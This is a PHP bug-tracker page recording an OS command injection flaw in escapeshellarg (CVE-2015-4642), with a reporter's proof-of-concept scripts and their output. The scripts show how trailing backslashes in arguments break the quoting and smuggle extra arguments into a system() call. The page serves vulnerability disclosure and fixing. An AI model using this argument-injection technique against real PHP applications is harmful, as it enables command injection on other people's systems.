|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
Patchesbug69464_php7.patch (last revision 2015-05-18 14:49 UTC by ab@php.net)bug64646_php5_plus_test (last revision 2015-05-18 14:48 UTC by ab@php.net) Pull RequestsHistoryAllCommentsChangesGit/SVN commits
[2015-05-15 23:13 UTC] ab@php.net
-Status: Open
+Status: Verified
-Assigned To:
+Assigned To: ab
[2015-05-15 23:13 UTC] ab@php.net
[2015-05-18 14:48 UTC] ab@php.net
[2015-05-18 14:49 UTC] ab@php.net
[2015-05-18 14:51 UTC] ab@php.net
[2015-06-10 04:40 UTC] stas@php.net
-Status: Verified
+Status: Closed
[2015-06-10 04:40 UTC] stas@php.net
[2015-06-10 07:42 UTC] tyrael@php.net
[2015-06-10 08:50 UTC] tyrael@php.net
[2015-06-10 08:50 UTC] tyrael@php.net
[2015-06-10 09:15 UTC] jpauli@php.net
[2015-06-11 12:29 UTC] php at bof dot de
[2015-06-18 12:31 UTC] kaplan@php.net
-CVE-ID:
+CVE-ID: 2015-4642
[2015-07-01 17:39 UTC] francois dot gagne at gmail dot com
[2016-07-20 11:38 UTC] davey@php.net
|
|||||||||||||||||||||||||||
Copyright © 2001-2025 The PHP GroupAll rights reserved. |
Last updated: Tue Nov 04 09:00:01 2025 UTC |
Description: ------------ In following is the report from Takayuki Uchiyama. This issue is an OS command injection vulnerability. Do you have a specific case that fails? I have attached the proof-of-concept code to reproduce this issue. ---------------------------------------------------------------------- PoC Code ---------------------------------------------------------------------- [poc.php] ------------------ <?php $a = 'a\\'; $b = 'b -c d\\'; var_dump( $a, escapeshellarg($a) ); var_dump( $b, escapeshellarg($b) ); system( 'php arginfo.php ' . escapeshellarg($a) . ' ' . escapeshellarg($b) ) ?> ------------------ [arginfo.php] ------------------ <?php print( "--- ARG INFO ---\n" ); var_dump( $argv ); ?> ------------------ ---------------------------------------------------------------------- PoC Code ---------------------------------------------------------------------- After running 'php poc.php', if you get the following output, that version of PHP is still vulnerable. ---------------------------------------------------------------------- Output ---------------------------------------------------------------------- string(2) "a\" string(4) ""a\"" string(7) "b -c d\" string(9) ""b -c d\"" --- ARG INFO --- array(4) { [0]=> string(11) "arginfo.php" [1]=> string(4) "a" b" [2]=> string(2) "-c" [3]=> string(2) "d"" } [Comment] The first 4 lines are the output from the var_dump function in poc.php. By comparing this output with the 4-5th lines of poc.php, the output from the escapeshellarg function, it can be seen that an attacker can set a single string that is not "" escaped as a parameter. Similarly, the 10 lines that follow --- ARG INFO --- command line arguments when arginfo.php is called, which are output by the var_dump function in arginfo.php. When comparing this to the way the system function is called (with 2 parameters) in poc.php, it can be seen that command line interprets is as 3 paramaters. ---------------------------------------------------------------------- Output ----------------------------------------------------------------------